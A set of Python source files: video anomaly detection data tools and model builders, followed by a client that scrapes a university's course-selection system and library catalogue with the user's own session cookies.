object_score = np.empty(shape=(raw_data.shape[0],),dtype=np.float32)
for index, dummy_objects in enumerate(raw_data):
# temp = np.max(-dummy_objects)
temp = np.max(dummy_objects)
object_score[index] = temp
frame_score = np.max(object_score)
return frame_score
def reconstruction_loss(x_hat, x):
'''
The input is the video clip, and we use the RL as the score.
RL := Reconstruction Loss
'''
x_hat = x_hat.squeeze(0).detach()
x = x.squeeze(0).detach()
rl = torch.sqrt(torch.pow((x_hat - x), 2))
h_dim = len(rl.shape) - 2
w_dim = len(rl.shape) - 1
rl = torch.mean(rl, (h_dim, w_dim))
return rl
```
#### File: lib/datatools/tools.py
```python
import os
import sys
import cv2
sys.path.append('../../')
print(sys.path)
import json
import torch
from PIL import Image
import numpy as np
from pathlib import Path
import torchvision.transforms.functional as tf
from tqdm import tqdm
from lib.utils.image_ops import image_gradient
def make_objects_db(data_path, split='training',det_threshold=0.95, time_file='./training_3.json', verbose='none'):
"""
Make the database based on the detections
Args:
data_path: e.g. 'data/shanghaitech/normal'
det_threshold: 0.5
"""
original_path = Path(data_path) / split
detection_path = original_path / 'detection_cascade'
images_path = original_path / 'frames'
print(original_path)
final_path = original_path / 'objects'
# temp_folder = './temp'
if not os.path.exists(final_path):
os.makedirs(final_path)
final = dict()
with open(time_file, 'r') as f:
temp = json.load(f)
det_results = sorted(os.listdir(detection_path))
pbar = tqdm(range(len(det_results)))
# count = 0
for frame_det in det_results:
pbar.set_description('Processing: {}'.format(frame_det))
video_name = '_'.join(frame_det.split('.')[0].split('_')[0:-1])
image_name = frame_det.split('.')[0].split('_')[-1]
npy_file = detection_path / frame_det
detections = np.load(npy_file)
finals = _produce_detection(detections[0], detections[1], detections[2], detections[3], detections[7])
# finals = _produce_detection(detections[0])
for index, det in enumerate(finals):
if det[4] <= det_threshold:
continue
current_frame = frame_det.split('.')[0]
back_frame = temp[current_frame]['back']
front_frame = temp[current_frame]['front']
object_c = _crop_det_cv2(images_path / video_name / (image_name + '.jpg'), det)
object_b = _crop_det_cv2(images_path / video_name / (back_frame + '.jpg'), det)
object_f = _crop_det_cv2(images_path / video_name / (front_frame + '.jpg'), det)
try:
back_gradient_x, back_gradient_y = image_gradient(object_b.unsqueeze_(0).unsqueeze_(0))
except Exception as err:
print(err)
import ipdb; ipdb.set_trace()
back_gradient = torch.cat([back_gradient_x, back_gradient_y], dim=1).squeeze_(0)
front_gradient_x, front_gradient_y = image_gradient(object_f.unsqueeze_(0).unsqueeze_(0))
front_gradient = torch.cat([front_gradient_x, front_gradient_y], dim=1).squeeze_(0)
# import ipdb; ipdb.set_trace()
final[frame_det.split('.')[0] + '#' +str(index)] = dict()
final[frame_det.split('.')[0] + '#' +str(index)]['current'] = object_c
final[frame_det.split('.')[0] + '#' +str(index)]['back_gradient'] = back_gradient
final[frame_det.split('.')[0] + '#' +str(index)]['front_gradient'] = front_gradient
# count += 1
pbar.update(1)
# if count > 20:
# break
try:
final_name = final_path / (split + '_' + verbose + '.pt')
torch.save(final, final_name)
except Exception as err:
print(err)
def _produce_detection(*args):
# make the empty detection format
dummy = np.array([0,0,0,0,0], dtype=np.float64)
lm = lambda x: x if x.size > 0 else np.array([dummy])
init = np.array([dummy])
for detect in args:
# pad the None object
new_detect = lm(detect)
# make them in one array
init = np.concatenate((init, new_detect))
# filter the not empty ones
f = filter(lambda x : (x != np.array(dummy)).any(), init)
new_init = [x for x in f]
# deal with the situation of no detection
if new_init == []:
new_init = np.array([dummy])
return new_init
def _crop_det(image_path, det, mode='gray'):
'''
Args:
mode: 'gray' or 'rgb'
'''
img = Image.open(image_path).convert('L')
xmin = det[0]
ymin = det[1]
xmax = det[2]
ymax = det[3]
height = ymax - ymin
width = xmax -xmin
temp_obj = tf.crop(img, int(ymin), int(xmin), int(height), int(width)) # ymin, xmin, height, width
obj = tf.to_tensor(temp_obj)
return obj
def _crop_det_cv2(image_path, det):
'''
Args:
mode: 'gray' or 'rgb'
'''
print(image_path)
image_path = str(image_path)
try:
img = cv2.imread(image_path, 0)
except:
print('in _crop_cv2')
import ipdb; ipdb.set_trace()
xmin = int(det[0])
ymin = int(det[1])
xmax = int(det[2])
ymax = int(det[3])
height = ymax - ymin
width = xmax -xmin
# temp_obj = tf.crop(img, int(ymin), int(xmin), int(height), int(width)) # ymin, xmin, height, width
temp_obj = img[ymin:ymax, xmin:xmax] # ymin, xmin, height, width
obj = torch.from_numpy(temp_obj)
return obj
def _get_gradient(image_1, image_2):
'''
images_1 - images_2
'''
gradient = lambda x, y: x - y
# images_pair = zip(images_1, images_2)
# gs = list() # gs = gradients of the images
# for x, y in images_pair:
im_1 = tf.to_tensor(image_1)
im_2 = tf.to_tensor(image_2)
gs = gradient(im_1,im_2)
# gs.append(temp)
return gs
def make_global_db(data_path, split='testing'):
"""
Make the database based on the detections
Args:
data_path: e.g. 'data/shanghaitech/normal'
"""
original_path = Path(data_path)
final_path = original_path / 'global'
images_path = original_path / 'frames'
# temp_folder = './temp'
if not os.path.exists(final_path):
os.makedirs(final_path)
final = dict()
# with open(time_file, 'r') as f:
# temp = json.load(f)
video_list = sorted(os.listdir(images_path))
pbar = tqdm(range(len(video_list)))
# count = 0
for video in video_list:
pbar.set_description('Processing: {}'.format(video))
video_path = images_path / video
# finals = _produce_detection(detections[0])
images_list = sorted(os.listdir(video_path))
for index, image in enumerate(images_list):
temp = Image.open(video_path / image).convert('L')
final[video + '#' +str(index)] = temp
# count += 1
pbar.update(1)
# if count > 20:
# break
final_name = final_path / (split + '.pt')
torch.save(final, final_name)
def decide_back_front(dataset_path, verbose='testing_vad', duration=3):
'''
decide the back and front, save in json
Args:
dataset_path: e.g. './data/shanghaitech/training/frames'
duration: step, e.g. current-3, current+3
'''
video_path = Path(dataset_path)
video_list = sorted(os.listdir(video_path))
final = dict()
for video in video_list:
frames_list = sorted(os.listdir(video_path / video))
for index, _ in enumerate(frames_list):
# get the image behind the current frame
if index - duration <= 0:
img_b = frames_list[0]
else:
img_b = frames_list[index - duration]
# get the image before the current frame
if index + duration >= len(frames_list):
img_f = frames_list[-1]
else:
img_f = frames_list[index + duration]
# get the image name
img_current = video + '_' + frames_list[index].split('.')[0]
final[img_current] = dict()
# final[img_current]['back'] = video + '_' + img_b.split('.')[0]
final[img_current]['back'] = img_b.split('.')[0]
# final[img_current]['front'] = video + '_' + img_f.split('.')[0]
final[img_current]['front'] = img_f.split('.')[0]
with open(verbose+'_'+str(duration) + '.json', 'w') as f:
json.dump(final, f)
print('finish')
def make_objects_box_db(data_path, split='training',det_threshold=0.95, time_file='./training_3.json', verbose='none'):
"""
Make the database based on the detections
Args:
data_path: e.g. 'data/shanghaitech/normal'
det_threshold: 0.5
"""
original_path = Path(data_path) / split
detection_path = original_path / 'detection_cascade'
# images_path = original_path / 'frames'
print(original_path)
final_path = original_path / 'objects'
# temp_folder = './temp'
if not os.path.exists(final_path):
os.makedirs(final_path)
final = dict()
with open(time_file, 'r') as f:
temp = json.load(f)
det_results = sorted(os.listdir(detection_path))
pbar = tqdm(range(len(det_results)))
# count = 0
for frame_det in det_results:
pbar.set_description('Processing: {}'.format(frame_det))
video_name = '_'.join(frame_det.split('.')[0].split('_')[0:-1])
image_name = frame_det.split('.')[0].split('_')[-1]
npy_file = detection_path / frame_det
detections = np.load(npy_file)
finals = _produce_detection(detections[0], detections[1], detections[2], detections[3], detections[7])
# finals = _produce_detection(detections[0])
for index, det in enumerate(finals):
if det[4] <= det_threshold:
continue
current_frame = frame_det.split('.')[0]
back_frame = temp[current_frame]['back']
front_frame = temp[current_frame]['front']
# object_c = _crop_det_cv2(images_path / video_name / (image_name + '.jpg'), det)
# object_b = _crop_det_cv2(images_path / video_name / (back_frame + '.jpg'), det)
# object_f = _crop_det_cv2(images_path / video_name / (front_frame + '.jpg'), det)
# back_gradient_x, back_gradient_y = image_gradient(object_b.unsqueeze_(0).unsqueeze_(0))
# back_gradient = torch.cat([back_gradient_x, back_gradient_y], dim=1).squeeze_(0)
# front_gradient_x, front_gradient_y = image_gradient(object_f.unsqueeze_(0).unsqueeze_(0))
# front_gradient = torch.cat([front_gradient_x, front_gradient_y], dim=1).squeeze_(0)
# import ipdb; ipdb.set_trace()
final[frame_det.split('.')[0] + '#' +str(index)] = dict()
final[frame_det.split('.')[0] + '#' +str(index)]['box'] = det
final[frame_det.split('.')[0] + '#' +str(index)]['current_frame'] = video_name + '/' + image_name + '.jpg'
final[frame_det.split('.')[0] + '#' +str(index)]['back_frame'] = video_name + '/' + back_frame + '.jpg'
final[frame_det.split('.')[0] + '#' +str(index)]['front_frame'] = video_name + '/' + front_frame + '.jpg'
# count += 1
pbar.update(1)
# if count > 20:
# break
# import ipdb; ipdb.set_trace()
try:
final_name = final_path / (split + '_' + verbose + '.pt')
torch.save(final, final_name)
except Exception as err:
print(err)
if __name__ == '__main__':
# path = '/export/home/chengyh/reproduce/objec-centric/data/VAD/testing/frames'
# path_objects = '/export/home/chengyh/reproduce/objec-centric/data/VAD/'
path_objects = '/export/home/chengyh/reproduce/objec-centric/data/SHTech/'
# decide_back_front(path)
# make_objects_db(path_objects, split='training', det_threshold=0.6, time_file='./training_3.json', verbose='det0.6_cascade_grad')
make_objects_box_db(path_objects, split='testing', det_threshold=0.4, time_file='./testing_3.json', verbose='det0.4_cascade_only_box')
# make_global_db(path_objects)
```
#### File: lib/loss/build_loss.py
```python
from .build.abstract import LossBuilder
class LossAPI(LossBuilder):
def __init__(self, cfg, logger):
super(LossAPI, self).__init__(cfg)
self.logger = logger
def __call__(self):
loss_dict, loss_lamada = super(LossAPI, self).build()
self.logger.info(f'the loss names:{loss_dict.keys()}')
self.logger.info(f'the loss lamada:{loss_lamada}')
return loss_dict, loss_lamada
```
#### File: networks/build/abstract.py
```python
from .modelcatalog import ModelCatalog
class ModelBuilder(object):
def __init__(self, cfg):
self.cfg = cfg
def build(self):
model = ModelCatalog.get(self.cfg.MODEL.name, self.cfg)
return model
```
#### File: lib/networks/build_model.py
```python
from .build.abstract import ModelBuilder
from collections import OrderedDict
import torch
from colorama import init,Fore
init(autoreset=True)
class ModelAPI(ModelBuilder):
def __init__(self, cfg, logger):
# self.model_name = cfg.MODEL.name
super(ModelAPI, self).__init__(cfg)
self.logger = logger
def __call__(self):
model = super(ModelAPI, self).build()
self.logger.info('the name is' +Fore.RED +f'{self.cfg.MODEL.name}')
if isinstance(model, OrderedDict):
self.logger.info('Make the model is the'+ Fore.RED + ' OrderedDict')
message = 'The model keys are: '
for key in model.keys():
temp = Fore.RED + str(key) + Fore.GREEN + ','
message += temp
self.logger.info(message)
elif isinstance(model, torch.nn. Module):
self.logger.info('Make the model is the' + Fore.RED + 'nn.Module')
else:
raise Exception('No supprot model type')
return model
``` |
{
"source": "jokerwho/newzf",
"score": 3
} |
#### File: zfnweb/api/choose.py
```python
from bs4 import BeautifulSoup
import re
import time
import requests
import json
from urllib import parse
from requests import exceptions
with open('config.json', mode='r', encoding='utf-8') as f:
config = json.loads(f.read())
class Xuanke(object):
def __init__(self, base_url, cookies, year, term):
self.base_url = base_url
self.headers = {
'Referer': base_url,
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36'
}
self.cookies = cookies
if config["proxy"] == "none":
self.proxies = None
else:
self.proxies = {
'http': config["proxy"]
}
# self.nowyear = str(int(time.strftime("%Y", time.localtime())) - 1)
# self.nowterm = config["nowterm"]
self.nowyear = year
self.nowterm = term
def get_choosed(self):
"""获取已选课程信息"""
try:
choosed_url = parse.urljoin(self.base_url, '/xsxk/zzxkyzb_cxZzxkYzbChoosedDisplay.html?gnmkdm=N253512')
data = {
'xkxnm': self.nowyear,
'xkxqm': self.nowterm
}
try:
res = requests.post(choosed_url, data=data, headers=self.headers, cookies=self.cookies,
proxies=self.proxies, timeout=3)
except exceptions.Timeout as e:
return {'err': 'Connect Timeout'}
jres = res.json()
res_dict = {
'courseNumber': len(jres), # 已选课程数
'items': [{
'courseTitle': i.get("kcmc"),
'courseCategory': i.get("kklxmc"),
'teacher': (re.findall(r"/(.*?)/", i.get("jsxx")))[0],
'teacher_id': (re.findall(r"(.*?\d+)/", i.get("jsxx")))[0],
'classId': i.get("jxb_id"),
'classVolume': int(i.get("jxbrs")),
'classPeople': int(i.get("yxzrs")),
'courseRoom': (i.get("jxdd").split('<br/>'))[0] if '<br/>' in i.get("jxdd") else i.get("jxdd"),
'courseId': i.get("kch"),
'doId': i.get("do_jxb_id"),
'courseTime': (i.get("sksj").split('<br/>'))[0] + '、' + (i.get("sksj").split('<br/>'))[1] if '<br/>' in i.get(
"sksj") else i.get("sksj"),
'credit': float(i.get("xf")),
'chooseSelf': int(i.get("zixf")),
'waiting': i.get("sxbj")
} for i in jres]
}
return res_dict
except Exception as e:
print(e)
def get_bkk_list(self, bkk):
"""获取板块课选课列表"""
try:
"""获取head_data"""
sessions = requests.Session()
url_data1 = parse.urljoin(self.base_url, '/xsxk/zzxkyzb_cxZzxkYzbIndex.html?gnmkdm=N253512&layout=default')
data1 = sessions.get(url_data1, headers=self.headers, cookies=self.cookies, proxies=self.proxies,
timeout=3)
data1.encoding = data1.apparent_encoding
soup = BeautifulSoup(data1.text, 'html.parser')
gotCredit_list = []
for gotCredit_content in soup.find_all('font', color=re.compile('red')):
gotCredit_list.append(gotCredit_content)
gotCredit = gotCredit_list[2].string
kklxdm_list = []
xkkz_id_list = []
for tab_content in soup.find_all('a', role=re.compile('tab')):
onclick_content = tab_content.get('onclick')
r = re.findall(r"'(.*?)'", str(onclick_content))
kklxdm_list.append(r[0].strip())
xkkz_id_list.append(r[1].strip())
tab_list = [('bkk1_kklxdm', kklxdm_list[0]), ('bkk2_kklxdm', kklxdm_list[1]),
('bkk3_kklxdm', kklxdm_list[2]), ('bkk1_xkkz_id', xkkz_id_list[0]),
('bkk2_xkkz_id', xkkz_id_list[1]), ('bkk3_xkkz_id', xkkz_id_list[2])]
tab_dict = dict(tab_list)
data1_list = []
for data1_content in soup.find_all('input', type=re.compile('hidden')):
name = data1_content.get('name')
value = data1_content.get('value')
data1_list.append((str(name), str(value)))
data1_dict = dict(data1_list)
data1_dict.update(gotCredit=gotCredit)
data1_dict.update(tab_dict)
url_data2 = parse.urljoin(self.base_url, '/xsxk/zzxkyzb_cxZzxkYzbDisplay.html?gnmkdm=N253512')
data2_data = {
'xkkz_id': data1_dict["bkk" + bkk + "_xkkz_id"],
'xszxzt': '1',
'kspage': '0'
}
data2 = sessions.post(url_data2, headers=self.headers, data=data2_data, cookies=self.cookies,
proxies=self.proxies, timeout=3)
data2.encoding = data2.apparent_encoding
soup2 = BeautifulSoup(data2.text, 'html.parser')
data2_list = []
for data2_content in soup2.find_all('input', type=re.compile('hidden')):
name = data2_content.get('name')
value = data2_content.get('value')
data2_list.append((str(name), str(value)))
data2_dict = dict(data2_list)
data1_dict.update(data2_dict)
# print(data2_dict)
head_data = data1_dict
"""获取课程列表"""
url_kch = parse.urljoin(self.base_url, '/xsxk/zzxkyzb_cxZzxkYzbPartDisplay.html?gnmkdm=N253512')
url_bkk = parse.urljoin(self.base_url, '/xsxk/zzxkyzb_cxJxbWithKchZzxkYzb.html?gnmkdm=N253512')
kch_data = {
'bklx_id': head_data["bklx_id"],
'xqh_id': head_data["xqh_id"],
'zyfx_id': head_data["zyfx_id"],
'njdm_id': head_data["njdm_id"],
'bh_id': head_data["bh_id"],
'xbm': head_data["xbm"],
'xslbdm': head_data["xslbdm"],
'ccdm': head_data["ccdm"],
'xsbj': head_data["xsbj"],
'xkxnm': self.nowyear,
'xkxqm': self.nowterm,
'kklxdm': head_data["bkk" + bkk + "_kklxdm"],
'kkbk': head_data["kkbk"],
'rwlx': head_data["rwlx"],
'kspage': '1',
'jspage': '10'
}
kch_res = sessions.post(url_kch, headers=self.headers, data=kch_data, cookies=self.cookies,
proxies=self.proxies, timeout=3)
jkch_res = kch_res.json()
bkk_data = {
'bklx_id': head_data["bklx_id"],
'xkxnm': self.nowyear,
'xkxqm': self.nowterm,
'xkkz_id': head_data["bkk" + bkk + "_xkkz_id"],
'xqh_id': head_data["xqh_id"],
'zyfx_id': head_data["zyfx_id"],
'njdm_id': head_data["njdm_id"],
'bh_id': head_data["bh_id"],
'xbm': head_data["xbm"],
'xslbdm': head_data["xslbdm"],
'ccdm': head_data["ccdm"],
'xsbj': head_data["xsbj"],
'kklxdm': head_data["bkk" + bkk + "_kklxdm"],
'kch_id': jkch_res["tmpList"][0]["kch_id"],
'kkbk': head_data["kkbk"],
'rwlx': head_data["rwlx"],
'zyh_id': head_data["zyh_id"]
}
bkk_res = sessions.post(url_bkk, headers=self.headers, data=bkk_data, cookies=self.cookies,
proxies=self.proxies, timeout=3)
jbkk_res = bkk_res.json()
if bkk != '3' and (len(jkch_res["tmpList"]) != len(jbkk_res)):
res_dict = {'err': 'Error Length'}
return res_dict
list1 = jkch_res["tmpList"]
list2 = jbkk_res
for i in range(0, len(list1)):
list1[i].update(list2[i])
res_dict = {
'courseNumber': len(list1),
'items': [{
'courseTitle': j.get("kcmc"),
'teacher': (re.findall(r"/(.*?)/", j.get("jsxx")))[0],
'teacher_id': (re.findall(r"(.*?\d+)/", j.get("jsxx")))[0],
'classId': j.get("jxb_id"),
'doId': j.get("do_jxb_id"),
'kklxdm': head_data["bkk" + bkk + "_kklxdm"],
'classVolume': int(j.get("jxbrl")),
'classPeople': int(j.get("yxzrs")),
'courseRoom': (j.get("jxdd").split('<br/>'))[0] if '<br/>' in j.get("jxdd") else j.get("jxdd"),
'courseId': j["kch_id"],
'courseTime': (j.get("sksj").split('<br/>'))[0] + '、' + (j.get("sksj").split('<br/>'))[1] if '<br/>' in j.get(
"sksj") else j.get("sksj"),
'credit': float(j.get("xf")),
} for j in list1]
}
return res_dict
except Exception as e:
print(e)
def choose(self, doId, kcId, gradeId, majorId, kklxdm):
url_choose = parse.urljoin(self.base_url, '/xsxk/zzxkyzb_xkBcZyZzxkYzb.html?gnmkdm=N253512')
sess = requests.Session()
choose_data = {
'jxb_ids': str(doId),
'kch_id': str(kcId),
# 'rwlx': '3',
# 'rlkz': '0',
# 'rlzlkz': '1',
# 'sxbj': '1',
# 'xxkbj': '0',
# 'cxbj': '0',
'qz': '0',
# 'xkkz_id': '9B247F4EFD6291B9E055000000000001',
'xkxnm': self.nowyear,
'xkxqm': self.nowterm,
'njdm_id': str(gradeId),
'zyh_id': str(majorId),
'kklxdm': str(kklxdm),
# 'xklc': '1',
}
isOk = sess.post(url_choose, headers=self.headers, data=choose_data, cookies=self.cookies, proxies=self.proxies,
timeout=3)
result = isOk.json()
return result
def cancel(self, doId, kcId):
url_cancel = parse.urljoin(self.base_url, '/xsxk/zzxkyzb_tuikBcZzxkYzb.html?gnmkdm=N253512')
sess = requests.Session()
cancel_data = {
'jxb_ids': str(doId),
'kch_id': str(kcId),
'xkxnm': self.nowyear,
'xkxqm': self.nowterm,
}
isOk = sess.post(url_cancel, headers=self.headers, data=cancel_data, cookies=self.cookies, proxies=self.proxies,
timeout=3)
result = re.findall(r"(\d+)", isOk.text)[0]
return result
```
#### File: zfnweb/api/portal_library.py
```python
from bs4 import BeautifulSoup
import re
import time
import requests
import json
import traceback
from urllib import parse
class Personal(object):
def __init__(self, cookies):
self.login_url = 'http://ids.xcc.edu.cn/authserver/login?service=http%3A%2F%2Fopac.xcc.edu.cn%3A8080%2Freader%2Fhwthau.php'
self.st_url = ''
self.index_url = 'http://opac.xcc.edu.cn:8080/reader/redr_info.php'
self.info_url = 'http://opac.xcc.edu.cn:8080/reader/redr_info_rule.php'
self.booklist_url = 'http://opac.xcc.edu.cn:8080/reader/book_lst.php'
self.bookhist_url = 'http://opac.xcc.edu.cn:8080/reader/book_hist.php'
self.bookdetail_url = 'http://opac.xcc.edu.cn:8080/opac/item.php?marc_no='
self.paylist_url = 'http://opac.xcc.edu.cn:8080/reader/account.php'
self.paydetail_url = 'http://opac.xcc.edu.cn:8080/reader/fine_pec.php'
self.sess = requests.Session()
self.cookies = {'PHPSESSID':cookies['PHPSESSID']}
self.req = ''
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36 Edg/83.0.478.54',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
}
def get_info(self):
try:
index_req = self.sess.get(self.index_url, headers=self.headers,cookies=self.cookies,proxies={'http':'http://172.16.17.32:2589'},timeout=5)
index_soup = BeautifulSoup(index_req.text, 'lxml')
access_list = []
for a in index_soup.find_all(class_="bigger-170"):
access_list.append(a.get_text())
max_borrow = access_list[0].strip()
max_order = access_list[1].strip()
max_trust = access_list[2].strip()
percent = index_soup.find(class_="Num").get_text()
info_req = self.sess.get(self.info_url, headers=self.headers,cookies=self.cookies,proxies={'http':'http://172.16.17.32:2589'},timeout=5)
info_soup = BeautifulSoup(info_req.text,'lxml')
table = info_soup.find('div',{'id':"mylib_info"})
info_list = []
for i in range(0,9):
tr = table.find_all('tr')[i]
list = re.findall(r':(.*)',tr.text)
for j in list:
info_list.append(j)
res = {
'name':info_list[0],
'license_start':info_list[4],
'license_work':info_list[5],
'license_end':info_list[3],
'max_borrow':max_borrow,
'max_order':max_order,
'max_trust':max_trust,
'overdue':index_soup.find_all('span',class_='infobox-data-number')[0].get_text(),
'type':info_list[9],
'level':info_list[10],
'since':info_list[11],
'breaks':info_list[12],
'break_money':info_list[13],
'sex':info_list[20],
'deposit':info_list[27],
'charge':info_list[28],
'percent':percent
}
return res
except Exception:
traceback.print_exc()
def book_list(self):
try:
booklist_req = self.sess.get(self.booklist_url, headers=self.headers,cookies=self.cookies,proxies={'http':'http://172.16.17.32:2589'},timeout=5)
booklist_soup = BeautifulSoup(booklist_req.text,'lxml')
if booklist_soup.find(class_='iconerr') is not None:
return {'err':"当前无借阅"}
table = booklist_soup.find('table')
trs = table.find_all('tr')
res = {
'now': booklist_soup.find('div',id='mylib_content').find('p',style='margin:10px auto;').find_all('b')[0].get_text().strip(),
'max': booklist_soup.find('div',id='mylib_content').find('p',style='margin:10px auto;').find_all('b')[1].get_text().strip(),
'list':[{
'barcode':trs[i].find_all('td')[0].get_text(),
'book_name':trs[i].find_all('td')[1].a.get_text(),
'marc_no':trs[i].find_all('td')[1].a["href"][25:],
'bdate':trs[i].find_all('td')[2].get_text(),
'sdate':trs[i].find_all('td')[3].get_text().strip(),
'cnum':trs[i].find_all('td')[4].get_text(),
'location':trs[i].find_all('td')[5].get_text()
}for i in range(1,len(trs))]
}
return res
except Exception:
traceback.print_exc()
def book_hist(self):
try:
bookhist_req = self.sess.post(self.bookhist_url, headers=self.headers,cookies=self.cookies,data={'para_string':"all"},proxies={'http':'http://172.16.17.32:2589'},timeout=5)
bookhist_soup = BeautifulSoup(bookhist_req.text,'lxml')
if bookhist_soup.find(class_='iconerr') is not None:
return {'err':"无历史借阅"}
table = bookhist_soup.find('table')
trs = table.find_all('tr')
res = [{
'index':trs[i].find_all('td')[0].get_text(),
'barcode':trs[i].find_all('td')[1].get_text(),
'book_name':trs[i].find_all('td')[2].a.get_text(),
'marc_no':trs[i].find_all('td')[2].a["href"][25:],
'author':trs[i].find_all('td')[3].get_text(),
'start_time':trs[i].find_all('td')[4].get_text(),
'back_time':trs[i].find_all('td')[5].get_text(),
'location':trs[i].find_all('td')[6].get_text()
}for i in range(1,len(trs))]
return res
except Exception:
traceback.print_exc()
def paylist(self):
try:
paylist_req = self.sess.post(self.paylist_url, headers=self.headers,cookies=self.cookies,proxies={'http':'http://172.16.17.32:2589'},timeout=5)
paylist_soup = BeautifulSoup(paylist_req.text, 'lxml')
if paylist_soup.find(class_='iconerr') is not None:
return {'err':"无账目清单"}
table = paylist_soup.find('table')
trs = table.find_all('tr')
sta = "".join(trs[len(trs)-1].find_all('td')[0].get_text().strip().split())
res = {
'sta':sta[sta.find(':')+1:][:sta[sta.find(':')+1:].find('(')],
'list':[{
'date':trs[i].find_all('td')[0].get_text().strip(),
'type':trs[i].find_all('td')[1].get_text().strip(),
'bm':trs[i].find_all('td')[2].get_text().strip(),
'sm':trs[i].find_all('td')[3].get_text().strip(),
'way':trs[i].find_all('td')[4].get_text().strip(),
'bill':trs[i].find_all('td')[5].get_text().strip()
}for i in range(1,len(trs)-1)]
}
return res
except Exception:
traceback.print_exc()
def paydetail(self):
try:
paydetail_req = self.sess.post(self.paydetail_url, headers=self.headers,cookies=self.cookies,proxies={'http':'http://172.16.17.32:2589'},timeout=5)
paydetail_soup = BeautifulSoup(paydetail_req.text, 'lxml')
# status = 1
for i in paydetail_soup.find_all(class_='iconerr'):
# if "违章记录" not in i.get_text():
# # status = 0
# return {'err':"有违章记录,请联系管理员"}
if "欠款记录为空" in i.get_text():
# status = 0
return {'err':"无缴费记录"}
table = paydetail_soup.find('h2',text='欠款信息').find_next_sibling()
trs = table.find_all('tr')
res = [{
'barcode':trs[i].find_all('td')[0].get_text().strip(),
'position':trs[i].find_all('td')[1].get_text().strip(),
'book_name':trs[i].find_all('td')[2].a.get_text().strip(),
'marc_no':trs[i].find_all('td')[2].a["href"][25:],
'author':trs[i].find_all('td')[3].get_text().strip(),
'bd':trs[i].find_all('td')[4].get_text().strip(),
'sd':trs[i].find_all('td')[5].get_text().strip(),
'location':trs[i].find_all('td')[6].get_text().strip(),
'sp':trs[i].find_all('td')[7].get_text().strip(),
'ap':trs[i].find_all('td')[8].get_text().strip(),
'sta':trs[i].find_all('td')[9].get_text().strip()
}for i in range(1,len(trs))]
return res
except Exception:
traceback.print_exc()
class Search(object):
def __init__(self):
self.search_url = 'http://opac.xcc.edu.cn:8080/opac/openlink.php?onlylendable=yes&'
self.bookdetail_url = 'http://opac.xcc.edu.cn:8080/opac/item.php?marc_no='
self.headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36 Edg/83.0.478.54',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
}
def search_book(self,type,content,page):
try:
search_result_req = requests.get(self.search_url + type + "=" + content + "&page=" + page, headers=self.headers,proxies={'http':'http://172.16.17.328:2589'},timeout=5)
search_result_soup = BeautifulSoup(search_result_req.text,'lxml')
mainbox = search_result_soup.find('div',id='content')
num = mainbox.find('strong',class_='red').get_text()
search_list = mainbox.find('ol',id='search_book_list').find_all('li')
try:
pages = mainbox.find('span',class_='num_prev').find('font',color='black').get_text()
except:
pages = "1"
res = {
'type': type,
'content': content,
'num': num,
'page': page,
'pages': pages,
'list': [{
'type': search_list[i].h3.span.get_text(),
'title': search_list[i].h3.a.get_text()[search_list[i].h3.a.get_text().find('.')+1:],
'author': [text.strip() for text in search_list[i].p.find_all(text=True) if text.parent.name !='span' and text.strip()][0],
'code': [text.strip() for text in search_list[i].h3.find_all(text=True) if text.parent.name !='span' and text.parent.name != 'a' and text.strip()][0],
'publish': "".join([text.strip() for text in search_list[i].p.find_all(text=True) if text.parent.name !='span' and text.strip()][1].split()),
'marc_no': search_list[i].h3.a['href'][17:],
'status': re.findall(r':(\d*)',search_list[i].p.span.get_text())
}for i in range(0,len(search_list))]
}
return res
except Exception:
traceback.print_exc()
def book_detail(self,marc_no):
try:
bookdetail_req = requests.get(self.bookdetail_url + marc_no, headers=self.headers,proxies={'http':'http://172.16.17.32:2589'},timeout=5)
bookdetail_soup = BeautifulSoup(bookdetail_req.text,'lxml')
bookdetail_info = bookdetail_soup.find(id='item_detail')
bookdetail_status = bookdetail_soup.find('table',id='item')
dls = bookdetail_info.find_all('dl')
trs = bookdetail_status.find_all('tr')
res = {'isbn':[],'author_oth':[]}
for i in range(0,len(dls)):
if "题名/责任者" in dls[i].dt.get_text():
res['title'] = dls[i].dd.a.get_text()
res['hole'] = dls[i].dd.get_text()
if "出版发行项" in dls[i].dt.get_text():
res['imprint'] = dls[i].dd.get_text()
if "ISBN及定价" in dls[i].dt.get_text():
res['isbn'].append(dls[i].dd.get_text())
if "载体形态项" in dls[i].dt.get_text():
res['physical'] = dls[i].dd.get_text()
if "其它题名" in dls[i].dt.get_text():
res['title_oth'] = dls[i].dd.a.get_text()
if dls[i].dt.get_text() == "个人责任者:":
res['author'] = dls[i].dd.a.get_text()
if dls[i].dt.get_text() == "个人次要责任者:":
res['author_oth'].append(dls[i].dd.a.get_text())
if "学科主题" in dls[i].dt.get_text():
res['category'] = dls[i].dd.get_text()
if "中图法分类号" in dls[i].dt.get_text():
res['position'] = dls[i].dd.a.get_text()
if "一般附注" in dls[i].dt.get_text():
res['notes'] = dls[i].dd.get_text()
if "责任者附注" in dls[i].dt.get_text():
res['author_notes'] = dls[i].dd.get_text()
if "提要文摘附注" in dls[i].dt.get_text():
res['contents'] = dls[i].dd.get_text()
res['status'] = [{
'position':trs[j].find_all('td')[0].get_text(),
'code':trs[j].find_all('td')[1].get_text(),
'date':"".join(trs[j].find_all('td')[2].get_text().split()),
'library':trs[j].find_all('td')[3].get_text().strip(),
'about':trs[j].find_all('td')[3].get('title'),
'now':trs[j].find_all('td')[4].get_text(),
}for j in range(1,len(trs))]
return res
except Exception:
traceback.print_exc()
```
#### File: zfnweb/api/portal_login.py
```python
from bs4 import BeautifulSoup
import re
import time
import requests
import json
import traceback
from urllib import parse
class PLogin(object):
def __init__(self):
self.login_url = 'http://ids.xcc.edu.cn/authserver/login?service=http%3A%2F%2Fportal.xcc.edu.cn%2Findex.portal'
